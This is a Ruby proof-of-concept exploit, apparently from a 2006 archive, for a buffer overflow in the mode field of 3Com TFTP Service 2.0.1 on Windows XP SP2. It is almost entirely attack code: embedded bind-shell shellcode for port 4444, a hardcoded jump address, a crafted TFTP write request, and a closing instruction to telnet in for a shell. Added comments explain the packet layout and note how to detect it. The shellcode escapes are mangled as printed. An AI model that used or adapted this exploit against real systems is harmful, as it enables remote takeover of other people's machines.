# Title : 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
# Published : 2006-11-30
# Author : cthulhu
# 3comtftpd_xpsp2.rb
#
# Copyright (C) cthulhu
#
#
# This is a PoC intended to exploit the 3Com TFTP Service version 2.0.1
# "long transporting mode" buffer overflow under Windows XP SP2 (English)
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comtftpd_xpsp2.rb <victimhost> <victimport>
# Default port is 69 if not specified
require 'socket'
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Payload bytes exactly as carried by this page. The generator line above
# states it is a bind shell on TCP 4444, which the final puts also assumes.
sc1 = "x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x02"
sc1 += "xafxbbx16x83xebxfcxe2xf4xfexc5x50x5bxeax56x44xe9"
sc1 +="xfdxcfx30x7ax26x8bx30x53x3ex24xc7x13x7axaex54x9d"
sc1 +="x4dxb7x30x49x22xaex50x5fx89x9bx30x17xecx9ex7bx8f"
sc1 +="xaex2bx7bx62x05x6ex71x1bx03x6dx50xe2x39xfbx9fx3e"
sc1 +="x77x4ax30x49x26xaex50x70x89xa3xf0x9dx5dxb3xbaxfd"
sc1 +="x01x83x30x9fx6ex8bxa7x77xc1x9ex60x72x89xecx8bx9d"
sc1 +="x42xa3x30x66x1ex02x30x56x0axf1xd3x98x4cxa1x57x46"
sc1 +="xfdx79xddx45x64xc7x88x24x6axd8xc8x24x5dxfbx44xc6"
sc1 +="x6ax64x56xeax39xffx44xc0x5dx26x5ex70x83x42xb3x14"
sc1 +="x57xc5xb9xe9xd2xc7x62x1fxf7x02xecxe9xd4xfcxe8x45"
sc1 +="x51xfcxf8x45x41xfcx44xc6x64xc7xaax4ax64xfcx32xf7"
sc1 +="x97xc7x1fx0cx72x68xecxe9xd4xc5xabx47x57x50x6bx7e"
sc1 +="xa6x02x95xffx55x50x6dx45x57x50x6bx7exe7xe6x3dx5f"
sc1 +="x55x50x6dx46x56xfbxeexe9xd2x3cxd3xf1x7bx69xc2x41"
sc1 +="xfdx79xeexe9xd2xc9xd1x72x64xc7xd8x7bx8bx4axd1x46"
sc1 +="x5bx86x77x9fxe5xc5xffx9fxe0x9ex7bxe5xa8x51xf9x3b"
sc1 +="xfcxedx97x85x8fxd5x83xbdxa9x04xd3x64xfcx1cxadxe9"
sc1 +="x77xebx44xc0x59xf8xe9x47x53xfexd1x17x53xfexeex47"
sc1 +="xfdx7fxd3xbbxdbxaax75x45xfdx79xd1xe9xfdx98x44xc6"
sc1 +="x89xf8x47x95xc6xcbx44xc0x50x50x6bx7exf2x25xbfx49"
sc1 +="x51x50x6dxe9xd2xafxbbx16"
jmp = "x63x20xdcx77" # jmp esi user32.dll xp sp 2 english
# Target host is the first argument. The port defaults to 69 (TFTP) and is
# taken verbatim from ARGV[1] when given, so it stays a String, not an Integer.
host = ARGV[0]
port = 69
if ARGV[1]
port = ARGV[1]
end
sock = UDPSocket.new()
puts "[+]Trying to connect to #{host}"
# UDPSocket#connect only records the peer address; nothing is exchanged with
# the target, so "connected" below does not mean the service answered.
# It also returns 0 on success, and 0 is truthy in Ruby, so this branch can
# never fire: a bad host/port surfaces as an exception from connect itself.
if (not sock.connect(host,port))
raise "Unable to connect to #{host}"
end
# TFTP write request (RFC 1350): opcode 2, filename, NUL, mode, NUL.
exploit = "x00x02"
exploit += "a"
exploit += "x00"
# Everything from here to the trailing NUL occupies the mode field, the
# "transporting mode" the title names as the overflowing field: filler,
# the payload, then the address. Detection note: RFC 1350 only defines the
# modes netascii/octet/mail, so a WRQ whose mode field is hundreds of bytes
# long is trivially anomalous for any TFTP-aware parser or IDS rule.
exploit += "x90"* 129
exploit += sc1
exploit += jmp
exploit += "x00"
puts "[+] Connected ... Sending exploit to victim"
# One UDP datagram on the connected socket; no reply is read or checked.
sock.send exploit,0
puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"